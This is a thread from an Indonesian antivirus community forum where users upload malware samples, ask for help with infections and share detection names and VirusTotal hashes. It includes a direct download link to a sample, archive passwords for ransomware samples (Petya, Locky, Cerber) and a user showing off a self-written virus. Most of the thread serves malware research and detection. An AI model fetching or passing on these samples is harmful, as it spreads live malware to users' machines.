Pas diklik #CMIIW

Sorry but you are not allowed to view spoiler contents.

Coba agan donwload Komponen yang disebutkan lalu diregister...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MozaikTM pada Maret 30, 2013, 08:30:49 PM
Nih ampel virus buatan ane gan,

namanya Starlight.A, tapi filenya idc.exe... >=) >=) >=)
hati" pas dijalanin gan, susah di killnya.... >=) >=)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Maxtrix pada Maret 30, 2013, 08:44:53 PM
@Dark Knight : gan , pass nya apa ?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MozaikTM pada Maret 30, 2013, 08:54:16 PM
@Dark Knight : gan , pass nya apa ?
hehe lupa,
pass: 4ppl1x
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Maxtrix pada Maret 30, 2013, 11:37:34 PM
Avira langsung alert TR/Dropper.Gen , AVAST + AVG ga ke detek
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MozaikTM pada Maret 30, 2013, 11:56:16 PM
Avira langsung alert TR/Dropper.Gen , AVAST + AVG ga ke detek
Jadi, kesimpulannya gimana..??
(gimana virus ane..?? :D :D)

klo sama Eset kedetek sbg NewHeur_PE virus... :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: DevilScreaM pada Maret 31, 2013, 07:30:18 AM
@Dark Knight : Thanks om atas vilusNya :D

- Membuat folder acak di Setiap drive
- Mencopykan diri ke system32
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Maxtrix pada Maret 31, 2013, 11:05:09 AM
@ScreaMAV : agan , run di sandboxie ya ?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MozaikTM pada Maret 31, 2013, 01:28:46 PM
@Dark Knight : Thanks om atas vilusNya :D

- Membuat folder acak di Setiap drive
- Mencopykan diri ke system32
sama" om, itu yang versi lama... :D
yang versi baru lebih kejam, tpi ane gk bakal nyebarin..... :D :D :-*
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: xxstreme pada April 11, 2013, 10:07:39 AM
om ini ada virus kaga pernah bisa di clean sama ke detek, antivirus cuma detect file  yg di buatnya
setiap jalani aplikasi .exe extension dia akan buat file baru dengan nama aplikasi.mgr kemudian di starup akan ada paofwrtd.mgr

dan setiap file.exe yang di buka akan berubah binarynya

virusnya udah ada sejak 6 bulan lalu
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: DevilScreaM pada April 11, 2013, 02:25:09 PM
@up^ Sepertinya itu Ramnit :D

#CMIIW
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: dyfa_grahatama pada April 12, 2013, 04:24:16 PM
Gan ane mau tanya virus yang suka ngeflooding sendiri itu apa ya?? 
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: goblinmas pada Mei 21, 2013, 10:10:16 AM
virus dorifel, tolong dibuat antinya secepatnya. :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: OFIX pada Juni 27, 2013, 12:54:17 PM
Mohon panduan... bagaimana cara mengembalikan file .doc yang berubah menjadi .jse?
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: DevilScreaM pada Juni 27, 2013, 01:56:55 PM
@^ Coba Gunakan PCMAV Express Serviks-JS  ;)


Doc tidak berubah menjadi .jse, tapi hanya di hidden oleh virus tersebut dan diganti dengan file .jse virusnya  ^_^
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: jarot14 pada September 22, 2013, 06:56:16 AM
tes
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: riyo pada September 22, 2013, 06:44:41 PM
Mohon panduan... bagaimana cara mengembalikan file .doc yang berubah menjadi .jse?

Coba baca testimoni ane di sini gan http://smadaver.com/konsultasi-virus/(help)-virus-annie-ani-ngendon-di-laptop-ane-gan/ (http://smadaver.com/konsultasi-virus/(help)-virus-annie-ani-ngendon-di-laptop-ane-gan/)
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: nat-joe pada Oktober 25, 2013, 10:09:54 PM
tolong ane master :(
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Oktober 26, 2013, 05:30:04 PM
Om Zai,, Smadav lum mampu membersihkan virus ini dari laptop aq
mohon bantuannya, matursuwun
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Oktober 26, 2013, 05:31:53 PM
q upload virus soale gak bisa, nih warnet kena conficker.b jadi gag bisa buka avast, kaspersky, dll
makanya q upload lewat sini ae,,,
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: Adikazul pada Oktober 27, 2013, 09:12:33 PM
Virus shortcut flashdisk
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada November 06, 2013, 07:45:39 AM
mas zai mhon bantuannya
nih virus q nemu d warnet kmren sore. tk scan pke smadav 942 dan pcmav 95 g dkenali blass. pdhal virusx bxk skali. nih virus mnduplikat mp3 mnjdi exe dg ukuran 365 kb
mhon dmasukin smadav om zai
n d review d viruslokal
matursuwun
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada November 06, 2013, 01:39:08 PM
Om Zai,, Smadav lum mampu membersihkan virus ini dari laptop aq
mohon bantuannya, matursuwun
Silakan coba bersihkan dengan Smadav 9.4.2 (www.smadav.net) , update Smadavnya! :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rh354 pada November 08, 2013, 04:01:44 PM
mas zai mhon bantuannya
nih virus q nemu d warnet kmren sore. tk scan pke smadav 942 dan pcmav 95 g dkenali blass. pdhal virusx bxk skali. nih virus mnduplikat mp3 mnjdi exe dg ukuran 365 kb
mhon dmasukin smadav om zai
n d review d viruslokal
matursuwun
di eset dikenali sebagai a variant of Win32/4Shared.J potentially unwanted application      
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: budi_CAHYONO pada November 09, 2013, 10:21:36 PM
Tolong master" virus...
file ini banyak banget di hdd, di satu folder saja bisa sampi 6000+ , file hidden jadi awalnya tidak kelihatan  ~x( , mau saya nyatakan sebagai virus di smadav tidak terdeteksi sbagai virus. ???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rh354 pada November 11, 2013, 03:39:42 PM
Tolong master" virus...
file ini banyak banget di hdd, di satu folder saja bisa sampi 6000+ , file hidden jadi awalnya tidak kelihatan  ~x( , mau saya nyatakan sebagai virus di smadav tidak terdeteksi sbagai virus. ???
di eset dikenali sebagai Win32/Chir.B virus
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada November 16, 2013, 06:32:54 PM
om,, ni script apaan yaaa
kok mawar kuning gitu scriptnya
mohon dijelaskan Om

Sorry but you are not allowed to view spoiler contents.
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada November 30, 2013, 06:48:28 PM
nemu virus lagi om di warnet
mohon dimasukin db smadav Om

Sorry but you are not allowed to view spoiler contents.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada November 30, 2013, 06:49:12 PM

VirusTotal
SHA256:    edf989e61234166b968d2104c5a08268fd376a8c6cb8a668db246b04c5c68ef4
File name:    anakkecildiajarinnge.3gp.rar
Detection ratio:    21 / 48
Analysis date:    2013-11-30 11:45:28 UTC ( 0 minutes ago )
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada November 30, 2013, 06:51:51 PM
om,, ni script apaan yaaa
kok mawar kuning gitu scriptnya
mohon dijelaskan Om

Sorry but you are not allowed to view spoiler contents.

ternyata gag ada yang jelasin e
mana nih yg paham kode batch
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: renno pada November 30, 2013, 09:16:19 PM
nemu virus lagi om di warnet
mohon dimasukin db smadav Om

Sorry but you are not allowed to view spoiler contents.

Sudah bisa dideteksi Kompas AntiVirus 3.0 update online terbaru dengan nama deteksi Win32.InstalleRex.LC
Gambar : http://s9.postimg.org/tybu1iqe7/screenshot_236.png

Download Kompas AntiVirus 3.0 : http://www.softpedia.com/get/Antivirus/Kompas-Antivirus.shtml
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: Aming Anjas Asmara Pamungkas pada Desember 03, 2013, 03:02:12 AM
Kutip
nemu virus lagi om di warnet
mohon dimasukin db smadav Om

Sorry but you are not allowed to view spoiler contents.

Sudah bisa dideteksi Anjav Smart Security terbaru dengan nama deteksi Win32.InstalleRex.AI [PUP]
Gambar : http://s27.postimg.org/db6jxa2cj/Anjav.png

Nantikan Anjav Antivirus di Website Resmi : http://anjav.metroworld.us
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Januari 05, 2014, 01:17:22 PM
om mimin, upload virus di forum ni lwt opera mini kok gak bisa terus yaa???
kalo upload virus dr smadav.net malah gak muncul page upload nya lwt opera mini

mohon donk disupportin ama browser hape (ucweb, opmin)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: mdipa_yumansah pada Januari 05, 2014, 07:19:54 PM
om,, ni script apaan yaaa
kok mawar kuning gitu scriptnya
mohon dijelaskan Om

Sorry but you are not allowed to view spoiler contents.

kayaknya itu script virus gan
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: and43 pada Februari 01, 2014, 01:34:14 AM
Halo... Saya sudah lama menggunakan smadav dari versi 8.4 sampai sekarang 2014. tapi setelah update engine smadav 2014. baru kali ini salah satu file saya terdeteksi sebagai virus. apa ini benar atau false alarm ? saya meminta tolong pada agan sista yang lebih master dalam menganalisis file yang saya lampirkan dibawah ini. jika berkenan membantu saya.  ( file saya aman dari antivirus lainnya, jika smadav menganalisinya sebagai virus, saya tidak keberatan untuk menghapusnya ) Terima Kasih...
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: nasabia pada Februari 23, 2014, 06:56:29 PM
mohon dicheck dong, ni virus pa bukan, udah di delete tapi selalu muncul muncul lagi
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: andylisa pada Maret 25, 2014, 06:50:07 PM
makasih infonya sangat bermanfaat sekali
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: C00LZ pada Juni 27, 2014, 06:06:07 PM
mohon di cek file di sini  ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: renno pada Juni 28, 2014, 05:43:16 PM
mohon di cek file di sini  ^:)^

dari hasil virustotal menyatakan bersih. ada apa dengan file tersebut?
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: SATRIA.MAHARDIKA pada Oktober 19, 2014, 10:52:03 PM
mas mau nanya apakah file saya ini firus atw recycler ya...
nama file nya 6a1cea63d5221252ded63
pada saat mau di del, harus ada permision dari administrator, dan administratornya adalah NETWORK SERVICE
pas di scan jg gak ter-diteck virus, rencananya mau di upload sample nya tp kagak bisa di upload mas
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Manggolo pada Oktober 20, 2014, 07:36:19 AM
mas mau nanya apakah file saya ini firus atw recycler ya...
nama file nya 6a1cea63d5221252ded63
pada saat mau di del, harus ada permision dari administrator, dan administratornya adalah NETWORK SERVICE
pas di scan jg gak ter-diteck virus, rencananya mau di upload sample nya tp kagak bisa di upload mas
maaf kita tidak bisa hanya mengira-ngira saja tanpa sample atau report yang jelas
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: wisnuperdana pada Desember 24, 2014, 08:25:05 AM
mas virus punya saya sudah pernah discan dengan smadav dan sudah saya bersihkan,tetapi pas saya restart saya scan kembali masih ada virus trasher.run..,mohon solusinya  :(
Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Maret 08, 2016, 06:15:16 PM
Permisi Mastah-mastah dan agan-agan yang saya hormati..  ;)
Ada yang punya sampel virus adware ataupun ransomware? Jika ada mungkin bisa diupload, terima kasih..  :)
Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: Zai pada Maret 09, 2016, 10:21:23 AM
Beberapa sampel virus macro locky yang lagi tren dunia saat ini. Para master2 disini mari di research bersama  :D
Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Maret 09, 2016, 03:29:50 PM
Beberapa sampel virus macro locky yang lagi tren dunia saat ini. Para master2 disini mari di research bersama  :D
Terima kasih Bro Zai.. Izin download dulu..  :-bd
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: MozaikTM pada Maret 31, 2016, 07:55:45 AM
Sampel virus yang smadav belum bisa deteksi. Silahkan di cek. File nya udah aku ubah jadi .exe.txt  ^_^
Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada Maret 31, 2016, 03:24:29 PM
Sampel virus yang smadav belum bisa deteksi. Silahkan di cek. File nya udah aku ubah jadi .exe.txt  ^_^

Ok. akan ditindak lanjuti.
Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Maret 31, 2016, 05:01:57 PM
Sampel virus yang smadav belum bisa deteksi. Silahkan di cek. File nya udah aku ubah jadi .exe.txt  ^_^
Passwordnya apa ya gan?
Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: Zai pada April 02, 2016, 12:26:11 PM
Sampel virus yang smadav belum bisa deteksi. Silahkan di cek. File nya udah aku ubah jadi .exe.txt  ^_^

Thanks, akan dimasukkan ke database Smadav 10.6
Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: MozaikTM pada April 04, 2016, 10:55:57 AM
Passwordnya apa ya gan?
kalo gk salah ada di komentar arsip nya...
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: FMB pada April 12, 2016, 02:41:02 PM
Nih ada virus.. :)

Dideteksi oleh MSE sebagai Trojan:Win32/Rekilc.B sama SoftwareBundler:Win32/Minezota

Dan belum bisa dideteksi oleh smadav terbaru 10.6  :-\
Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: MozaikTM pada April 12, 2016, 02:51:51 PM
OK. Makasih buat sample nya...

Lumayan, buat koleksi.... ;D
Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: MozaikTM pada April 28, 2016, 02:09:25 PM
Virus Petya, salah satu jenis Ransomware (dapet dari forum luar)...
siapa tau ada yang minat,  >=)

password:
Kode: [Pilih]
infected
Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: Zai pada Mei 09, 2016, 10:40:56 AM
Sampel virus locky terbaru, versi JS dan XLS
Hati-hati ketika men-download attachment ini (hanya untuk peneliti/researcher yang mengerti cara meng-handle sample virus)
Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada Mei 09, 2016, 10:46:23 AM
Locky terdownload, siap dianalisa. (y)
Sampel virus locky terbaru, versi JS dan XLS
Hati-hati ketika men-download attachment ini (hanya untuk peneliti/researcher yang mengerti cara meng-handle sample virus)
----
Update:
Laporan analisa dalam postingan: http://www.viruslokal.com/2016/05/ransomware-vba-downloader/
Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: MozaikTM pada Mei 09, 2016, 11:15:08 AM
Sampel virus locky terbaru, versi JS dan XLS
Hati-hati ketika men-download attachment ini (hanya untuk peneliti/researcher yang mengerti cara meng-handle sample virus)
Petya-nya gimana bang?
kali aja sampe ke Indonesia.... ;D
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: benny palty pada Mei 16, 2016, 09:15:24 PM
ini kak salah satu virus yang terbaca sebagai trojan, ini 1 dari hampir 2000 virus registry yang ada di laptop. awalnya ini bisa saya hapus, cuma karena menimbulkan masalah di windows akhirnya saya recovery dan waktu saya mau hapus ini secara manual, eh malah tidak bisa dihapus.

MOhon dianalisis kak, apakah ini benar virus trojan atau tidak. Terima Kasih
Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Mei 16, 2016, 10:23:28 PM
ini kak salah satu virus yang terbaca sebagai trojan, ini 1 dari hampir 2000 virus registry yang ada di laptop. awalnya ini bisa saya hapus, cuma karena menimbulkan masalah di windows akhirnya saya recovery dan waktu saya mau hapus ini secara manual, eh malah tidak bisa dihapus.

MOhon dianalisis kak, apakah ini benar virus trojan atau tidak. Terima Kasih
Hasil analisis virustotal (https://virustotal.com/id/file/8ba490c65cb6978b4aaa8565a6e1f5277d90ecd3f08669712a26a3edda668e3d/analysis/1463411858/) terhadap file yang agan upload ini adalah bukan virus.

Bisa agan jelaskan dari folder mana file sapi6558.dll ini berasal?
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: benny palty pada Mei 22, 2016, 10:32:23 AM
dari folder system32 kak.

oh ya kak pas aku lihat ulang lagi ternyata file itu bukan file virus kak, tapi file itu adalah file system yang diinfeksi virus trojan type apa gitu yang menyebabkan google chrome saya eror.

tapi kenapa hasilnya gak ada virus ya kak, padahal di antivirus saya, tulisannya bahwa file ini terinfeksi virus trojan dan saat mau dihapus malah gak bisa. tulisannya itu adalah bahwa ada perubahan yang membuat file ini gak bisa dihapus, hanya bisa dibaca saja.

itu aja sih kak, terima kasih atas penjelasannya
Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Mei 23, 2016, 12:28:51 PM
dari folder system32 kak.

oh ya kak pas aku lihat ulang lagi ternyata file itu bukan file virus kak, tapi file itu adalah file system yang diinfeksi virus trojan type apa gitu yang menyebabkan google chrome saya eror.

tapi kenapa hasilnya gak ada virus ya kak, padahal di antivirus saya, tulisannya bahwa file ini terinfeksi virus trojan dan saat mau dihapus malah gak bisa. tulisannya itu adalah bahwa ada perubahan yang membuat file ini gak bisa dihapus, hanya bisa dibaca saja.

itu aja sih kak, terima kasih atas penjelasannya
Anti virus apa yang agan pake itu? Nanti kita bersihkan lewat farbar aja di thread yang agan tulis itu  :)
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: benny palty pada Mei 24, 2016, 12:06:20 PM
ada 2 kak yaitu:

1) Malwarebytes
2) avast.
Judul: Dua Buah Sample Ransomware
Ditulis oleh: Ki@mhu pada Juni 02, 2016, 10:52:46 PM
Dapat dua jenis sample Ransomware dari Spam Email. Bro Ryan, coba dianalisis dan post hasilnya.
Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada Juni 03, 2016, 07:35:44 AM
Dapat dua jenis sample Ransomware dari Spam Email. Bro Ryan, coba dianalisis dan post hasilnya.
Terdownload. (y)
Akan saya analisa dan sambil nulis artikel terkait.
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: rendymutola6 pada Juni 25, 2016, 09:07:02 AM
Rekan²... PC tiba-tiba file word, excel, berubah jadi locky...

ini saya kirim contohnya... bgmn yaa cara balikin file tsb, mana file report dan data dari tahun lama berubah semua..

tolong yaa..

Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada Juni 25, 2016, 11:15:18 AM
Rekan²... PC tiba-tiba file word, excel, berubah jadi locky...

ini saya kirim contohnya... bgmn yaa cara balikin file tsb, mana file report dan data dari tahun lama berubah semua..

tolong yaa..
sudah coba pake tool ini belum gan...?
https://decrypter.emsisoft.com/download/autolocky

untuk decrypter ransomware lainnya, bisa di download di:
https://decrypter.emsisoft.com

jika kita tidak tahu jenis ransomware yang menginfeksi, berikut ini cara untuk mengidentifikasinya, yaitu dengan mengupload sample file ransom (file yang terenkripsi) ke: https://id-ransomware.malwarehunterteam.com

mudah2an berhasil ya...
Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Juli 14, 2016, 05:25:58 PM
Sampel Virus yang diupload oleh salah satu User di konfirmasi.com lantara upload manual ke Smadav agak bermasalah.

https://www.sendspace.com/file/kk86s3
Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: MozaikTM pada Juli 14, 2016, 07:02:25 PM
Sampel Virus yang diupload oleh salah satu User di konfirmasi.com lantara upload manual ke Smadav agak bermasalah.

https://www.sendspace.com/file/kk86s3
barusan gw download & buka
itu masuknya AdWare mazz...  ;>
Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: rickyrizky pada Juli 26, 2016, 10:14:20 AM
Cara Upload File :
Klik Reply
Klik Additional Options...
Lalu Browse

Upload MAX 102.400 KB

[DANGER!!]
Download attachment di forum ini hanya dilakukan oleh para profesional !!
Jangan ditiru dirumah! (don't try this at home!)
====


Berikut virus yang menyerang laptop saya , di SMADAV terdeteksi sebagai VBS.LoveKiller.A  , sudah di quarantine tapi tetap kembali setiap restart, dan tidak bias di delete atau clean.  apakah smadav team bias membantu ?  terima kasih.
Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Juli 26, 2016, 01:03:54 PM
====


Berikut virus yang menyerang laptop saya , di SMADAV terdeteksi sebagai VBS.LoveKiller.A  , sudah di quarantine tapi tetap kembali setiap restart, dan tidak bias di delete atau clean.  apakah smadav team bias membantu ?  terima kasih.

Bisa.. Sudah Saya balas di bagian ini: http://smadaver.com/konsultasi-virus/virus-apa-ni-ya-varian-baru-26052/msg242377/?topicseen#msg242377
Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: Zai pada Juli 27, 2016, 09:06:51 AM
Rilis 10.9 sebentar lagi dimulai dari forum, siap2 tester mencari bug sebanyak2nya :D

Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: rickyrizky pada Agustus 02, 2016, 12:40:02 PM
Bisa.. Sudah Saya balas di bagian ini: http://smadaver.com/konsultasi-virus/virus-apa-ni-ya-varian-baru-26052/msg242377/?topicseen#msg242377

sudah di upload hasilnya
Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada Agustus 20, 2016, 08:52:04 PM
serverx.exe
20082016
Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Agustus 20, 2016, 09:04:05 PM
serverx.exe
20082016
Makasih gan Ryan..
Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada September 20, 2016, 07:52:29 PM
Cerber 3 payload lengkap. Belum banyak AntiVirus yang mendeteksi ini.

https://www.virustotal.com/en/file/bc786ceb41a8a6fe81903deabacf3b68c443ad30bb3bee00e69298d358c9d274/analysis/1474374867/
https://www.virustotal.com/en/file/9085115709b7272429dc69cedacab36ce893e9245fc39075f69b4199b3c9a707/analysis/1474374960/

Menginfeksi lewat USB, yang mana Smadav belum Detect. Dia hanya Detect autorun.inf saja. Dikarenakan ini virus USB, Smadav sebaiknya menambah ini ke dalam Database.

Warning!!! Tanpa Password.
Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada September 24, 2016, 05:24:00 PM
Sampel tambahan Cerber 3.. Yang ini melengkapi yang pertama.. :-bd

Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: Zai pada September 24, 2016, 06:12:55 PM
Thanks, peniliti AV lain juga mari ikut teliti sample ini :)
Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: MozaikTM pada September 25, 2016, 02:12:35 AM
Thanks, peniliti AV lain juga mari ikut teliti sample ini :)
Yo, silakan diteliti...
Lagi gk bisa ikutan :D

Gk punya kompi buat dijadiin tumbal, VirtualBox? Lama instalnya ah.... ;D
Judul: Re:Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada September 25, 2016, 03:04:02 AM
Sampel tambahan Cerber 3.. Yang ini melengkapi yang pertama.. :-bd